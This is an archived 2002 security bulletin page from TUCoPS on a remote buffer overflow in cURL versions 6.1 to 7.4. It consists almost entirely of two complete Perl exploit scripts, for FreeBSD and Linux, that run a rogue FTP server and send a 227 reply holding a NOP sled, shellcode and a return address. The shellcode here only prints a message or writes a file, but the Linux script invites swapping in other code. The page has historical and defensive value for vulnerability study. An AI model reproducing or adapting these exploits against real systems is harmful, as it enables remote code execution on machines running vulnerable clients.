Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: web5332.htm

cURL remote buffer overflow exploits



7th May 2002 [SBWID-5332]
COMMAND

	cURL remote buffer overflow exploits

SYSTEMS AFFECTED

	cURL v 6.1 - 7.4

PROBLEM

	\'KF\' [http://www.snosoft.com/research/] posted :
	

	 --FreeBSD Exploit --

	

	--------------010208070202030806020806

	Content-Type: text/plain;

	 name=\"cURL-remote-FBSD.pl\"

	Content-Transfer-Encoding: 7bit

	Content-Disposition: inline;

	 filename=\"cURL-remote-FBSD.pl\"

	

	#!/usr/bin/perl

	#

	# Remote FreeBSD cURL exploit for versions 6.1 - 7.4

	#

	# Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)

	#

	# This exploit may only be used for testing purposes. More information 

	# about the used vulnerability can be found on securityfocus:

	#

	# http://online.securityfocus.com/bid/1804

	#

	# The shellcode will write \"Ha! Owned by a cURL!\" to stdout on the system

	# running cURL. The extra nops are needed because the buffer, which causes

	# the overflow, is altered.

	#

	# $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/

	# Ha! Owned by a cURL! 

	

	use IO::Socket;

	use Net::hostent;

	

	########################################################################

	

	$shellcode = 

	        \"\\xeb\\x14\\x5e\\x31\\xc0\\x6a\\x14\\x56\\x40\\x40\\x50\\xb0\\x04\\x50\\xcd\".

	        \"\\x80\\x31\\xc0\\x40\\x50\\xcd\\x80\\xe8\\xe7\\xff\\xff\\xff\\x48\\x61\\x21\".

	        \"\\x20\\x4f\\x77\\x6e\\x65\\x64\\x20\\x62\\x79\\x20\\x61\\x20\\x63\\x55\\x52\".

	        \"\\x4c\\x21\\x23\".

	

	         \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";

	

	while($_ = $ARGV[0], /^-/) {

	    shift;       

	    last if /^--$/;

	    /^-p/ && do { $port = shift; };

	    /^-l/ && do { $list = 1; };

	    /^-o/ && do { $offset = shift; };

	}

	

	

	$id     = `id -u`; chop($id);

	$size   =  225;

	$esp    =  0xbfbffbd4;

	$offset =  -140 unless $offset;

	$port   =  21 unless $port;

	

	if(!$list || $port > 1024 && $id != 0) {

	

	print <<\"TWENTE\";

	

	+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+

	

	   Usage :  $0 -l 

	   Option:  $0 -p <port to listen on>

	   Option:  $0 -o <offset>

	

	   Note: low ports require root privileges

	

	+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+

	

	TWENTE

	exit;

	

	}

	

	for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {

	    $buffer .= \"\\x90\";

	}

	

	$buffer .= $shellcode;

	$buffer .= pack(\'l\', ($esp + $offset)); 

	

	print(\"We are using return address: 0x\", sprintf(\'%lx\',($esp - $offset)), \"\\n\");

	print \"Starting to listen for incomming connections on port $port\\n\";

	

	my $sock = new IO::Socket::INET (

	                                 LocalPort => $port,

	                                 Proto => \'tcp\',

	                                 Listen => 1,

	                                 Reuse => 1,

	                                );

	die \"Could not create socket: $!\\n\" unless $sock;

	

	while($cl = $sock->accept()) {

	

	   $hostinfo = gethostbyaddr($cl->peeraddr);

	   printf \"[Received connect from %s]\\n\", $cl->peerhost;

	   print $cl \"220 Safemode.org FTP server (Version 666) ready.\\n\";

	   print $cl \"230 Ok\\n\";

	   print $cl \"227 $buffer\\n\";

	   sleep 2;

	

	}

	

	--------------010208070202030806020806--

	

	

	 --Linux Exploit --

	

	--------------030109090800050503000809

	Content-Type: text/plain;

	 name=\"cURL-remote-LNX.pl\"

	Content-Transfer-Encoding: 7bit

	Content-Disposition: inline;

	 filename=\"cURL-remote-LNX.pl\"

	

	#!/usr/bin/perl

	#

	# Remote linux cURL exploit for versions 6.1 - 7.4

	#

	# Written by zillion (at http://safemode.org && http://www.snosoft.com)

	# 

	# This exploit, which has been tested to work with cURL 6.4, 7.2 and 7.3,  

	# may only be used for testing purposes. Additionally, the author does not 

	# take any resposibilities for abuse of this file. More information about  

	# the used vulnerability can be found on securityfocus:

	#

	# http://online.securityfocus.com/bid/1804

	#

	# The shellcode will write \"Owned by a cURL ;)\" to the file /tmp/0wned.txt

	# You can replace it with whatever you want but be warned: due to buffer 

	# manipilation working shellcode might be altered.

	#

	# A FreeBSD version is also available on safemode.org

	

	use IO::Socket;

	use Net::hostent;

	

	$shellcode = # does a open() write() close() and exit(). 

	        \"\\xeb\\x40\\x5e\\x31\\xc0\\x88\\x46\\x0e\\xc6\\x46\\x21\\x09\\xfe\\x46\\x21\".

	        \"\\x88\\x46\\x22\\x8d\\x5e\\x0f\\x89\\x5e\\x23\\xb0\\x05\\x8d\\x1e\\x66\\xb9\".

	        \"\\x42\\x04\\x66\\xba\\xe4\\x01\\xcd\\x80\\x89\\xc3\\xb0\\x04\\x8b\\x4e\\x23\".

	        \"\\x66\\xba\\x0f\\x27\\x66\\x81\\xea\\xfc\\x26\\xcd\\x80\\xb0\\x06\\xcd\\x80\".

	        \"\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xbb\\xff\\xff\\xff\\x2f\\x74\\x6d\\x70\".

	        \"\\x2f\\x30\\x77\\x6e\\x65\\x64\\x2e\\x74\\x78\\x74\\x23\\x30\\x77\\x6e\\x65\".

	        \"\\x64\\x20\\x62\\x79\\x20\\x61\\x20\\x63\\x55\\x52\\x4c\\x20\\x3b\\x29\";

	

	while($_ = $ARGV[0], /^-/) {

	    shift;       

	    last if /^--$/;

	    /^-p/ && do { $port = shift; };

	    /^-l/ && do { $list = 1; };

	    /^-o/ && do { $offset = shift; };

	}

	

	

	$id     = `id -u`; chop($id);

	$size   =  249;

	$esp    =  0xbffff810;

	$offset =  -150 unless $offset;

	$port   =  21 unless $port;

	

	if(!$list || $port > 1024 && $id != 0) {

	

	print <<\"TWENTE\";

	

	   Usage :  $0 -l 

	   Option:  $0 -p <port to listen on>

	   Option:  $0 -o <offset>

	

	   Note: low ports require root privileges

	

	TWENTE

	exit;

	

	}

	

	for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {

	    $buffer .= \"\\x90\";

	}

	

	$buffer .= \"$shellcode\";

	$buffer .= pack(\'l\', ($esp + $offset)); 

	

	print(\"Listening on port $port. We are using return address: 0x\", sprintf(\'%lx\',($esp - $offset)), \"\\n\");

	

	my $sock = new IO::Socket::INET (

	                                 LocalPort => $port,

	                                 Proto => \'tcp\',

	                                 Listen => 1,

	                                 Reuse => 1,

	                                );

	die \"Could not create socket: $!\\n\" unless $sock;

	

	while($cl = $sock->accept()) {

	

	   $hostinfo = gethostbyaddr($cl->peeraddr);

	   printf \"[Received connect from %s]\\n\", $hostinfo->name || $cl->peerhost;

	   print $cl \"220 Safemode.org FTP server (Version 666) ready.\\n\";

	   print $cl \"230 Ok\\n\";

	   print $cl \"227 $buffer\\n\";

	   sleep 2;

	

	}

	

	--------------030109090800050503000809--

	

SOLUTION

	??


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH